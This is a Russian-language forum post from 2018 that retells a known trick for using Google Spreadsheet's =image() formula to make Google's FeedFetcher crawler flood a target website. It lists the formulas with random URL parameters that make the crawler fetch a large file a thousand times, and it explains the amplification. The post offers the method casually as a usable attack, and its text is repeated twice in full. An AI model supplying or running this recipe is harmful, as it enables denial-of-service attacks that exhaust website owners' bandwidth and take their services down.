reDUCT
19.02.2018, 17:52
Вспомнил недавно статейку в которой рассказывалось про DDOSс помощью "паука" FeedFetcher.
Лютый баян ну крч может кому то интересно будет.
Google использует своего «паука» FeedFetcherдля кэширования любого контента в Google Spreadsheet, вставленного через формулу =image(«link»).
Например, если в одну из клеток таблицы вставить формулу
=image("
http://example.com/image.jpg
")
Googleотправит паука FeedFetcherскачать эту картинку и закэшировать для дальнейшего отображения в таблице.
Однако если добавлять случайный параметр к URL картинки, FeedFetcher будет скачивать её каждый раз заново. Скажем, для примера, на сайте жертвы есть PDF-файл размером в 10 МБ. Вставка подобного списка в таблицу приведет к тому, что паук Google скачает один и тот же файл 1000 раз!
Вот к примеру:
=image("
http://targetname/file.pdf?r=1
")
=image("
http://targetname/file.pdf?r=2
")
=image("
http://targetname/file.pdf?r=3
")
=image("
http://targetname/file.pdf?r=4
")
...
=image("
http://targetname/file.pdf?r=1000
")
Все это может привести к исчерпанию лимита трафика у некоторых владельцев сайтов. Кто угодно, используя лишь браузер с одной открытой вкладкой, может запустить массированную HTTP GET FLOOD-атаку на любой веб-сервер.
Атакующему даже необязательно иметь быстрый канал. Поскольку в формуле используется ссылка на PDF-файл (т.е. не на картинку, которую можно было бы отобразить в таблице), в ответ от сервера Google атакующий получает только N/A. Это позволяет довольно просто многократно усилить атаку [Аналог DNS и NTP Amplification – прим. переводчика], что представляет серьезную угрозу.
Лютый баян ну крч может кому то интересно будет.
Google использует своего «паука» FeedFetcherдля кэширования любого контента в Google Spreadsheet, вставленного через формулу =image(«link»).
Например, если в одну из клеток таблицы вставить формулу
=image("
http://example.com/image.jpg
")
Googleотправит паука FeedFetcherскачать эту картинку и закэшировать для дальнейшего отображения в таблице.
Однако если добавлять случайный параметр к URL картинки, FeedFetcher будет скачивать её каждый раз заново. Скажем, для примера, на сайте жертвы есть PDF-файл размером в 10 МБ. Вставка подобного списка в таблицу приведет к тому, что паук Google скачает один и тот же файл 1000 раз!
Вот к примеру:
=image("
http://targetname/file.pdf?r=1
")
=image("
http://targetname/file.pdf?r=2
")
=image("
http://targetname/file.pdf?r=3
")
=image("
http://targetname/file.pdf?r=4
")
...
=image("
http://targetname/file.pdf?r=1000
")
Все это может привести к исчерпанию лимита трафика у некоторых владельцев сайтов. Кто угодно, используя лишь браузер с одной открытой вкладкой, может запустить массированную HTTP GET FLOOD-атаку на любой веб-сервер.
Атакующему даже необязательно иметь быстрый канал. Поскольку в формуле используется ссылка на PDF-файл (т.е. не на картинку, которую можно было бы отобразить в таблице), в ответ от сервера Google атакующий получает только N/A. Это позволяет довольно просто многократно усилить атаку [Аналог DNS и NTP Amplification – прим. переводчика], что представляет серьезную угрозу.